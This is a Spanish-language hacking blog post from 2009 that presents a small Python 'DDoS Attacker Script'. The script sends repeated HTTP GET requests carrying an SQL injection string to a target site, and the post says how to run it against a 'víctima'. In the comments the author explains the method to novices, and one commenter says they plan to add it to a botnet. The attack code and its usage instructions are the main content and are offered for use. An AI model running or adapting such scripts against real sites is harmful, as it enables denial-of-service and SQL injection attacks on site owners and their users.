El rincón de Zerial

Informática, GNU/Linux, Seguridad, Hacking, Programación, Ocio

DDoS Attacker Script: Peticiones automatizadas para lograr DoS

Agosto 2nd, 2009 · 8 Comentarios

DDoS Attacker Script” es un pequeño script que he escrito en python que nos sirve para lograr con éxito un ataque de denegación de servicio en un sitio web. Este script lo diseñe especialmente para ataques de sql injection.

El funcionamiento es muy sencillo, se conecta y hace una petición de la URI especificada:

#!/usr/bin/python
import socket, sys, os
print "][ Attacking " + sys.argv[1]  + " ... ]["
print "injecting " + sys.argv[2];
def attack():
	#pid = os.fork()
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((sys.argv[1], 80))
	print ">> GET /" + sys.argv[2] + " HTTP/1.1"
	s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
	s.send("Host: " + sys.argv[1]  + "\r\n\r\n");
	s.close()
for i in range(1, 10):
	attack()

La línea número 6 está comentada, si prefieren la pueden descomentar para ver lo que sucede.
El uso del script es de la siguiente forma:
$ python DDoS.py www.pagina.com SQLi
En www.pagina.com obviamente pondremos nuestra víctima y en SQLi, la cadena que hará el milagro, por ejemplo “ver_productos.php?id=55′ or ’1′=’1

Posts relacionados

Etiquetas: GNU/Linux · Hacking · Programación · Seguridad

8 respuestas hasta ahora ↓

  • 1
     asd // May 30, 2010 a las 12:09 am

    amigo podes explicar bien para los novatos que hacemos con ese codigo? en que parte se usa, en que programa etc gracias

  • 2
     Zerial // May 30, 2010 a las 9:40 pm

    @asd: Es super simple. Lo unico que hace ese codigo es crear varias conexiones a un host de destino. La idea es que encuentres una URL vulnerable (por ej. una consulta sql pesada) para ejecutarla varias veces

  • 3
     paulino perez // Nov 9, 2010 a las 2:24 am

    lo que no entiendo es como ejecuto el mardito script?

  • 4
     Zerial // Nov 9, 2010 a las 8:26 am

    Hola “paulino perez”:

    En el post aparece la instruccion para ejecutarlo:

    python DDoS.py http://www.pagina.com SQLi

  • 5
     osama // Nov 30, 2010 a las 5:34 pm

    muy interesante el codigo! le hare unas modificaciones para integrarlo a una botnet que estoy haciendo en python ^^”

  • 6
     KST // Dic 23, 2010 a las 1:21 pm

    No lo entiendo! Cualquiera que mire el log de su servidor sabrá de dónde viene la misma petición repetida!!

  • 7
     rafiña // Sep 1, 2011 a las 11:03 pm

    aqui lo que no se es que uso para ejecutar ese scrip… que se usa.

    tengo mi lap y…. que instalo

  • 8
     sombra // Nov 20, 2011 a las 9:47 pm

    rafiña si usas win tienes que instalar python para poder ejecutarlo en linux viene nativo en la mayoria de las distribuciones =)

Deja un Comentario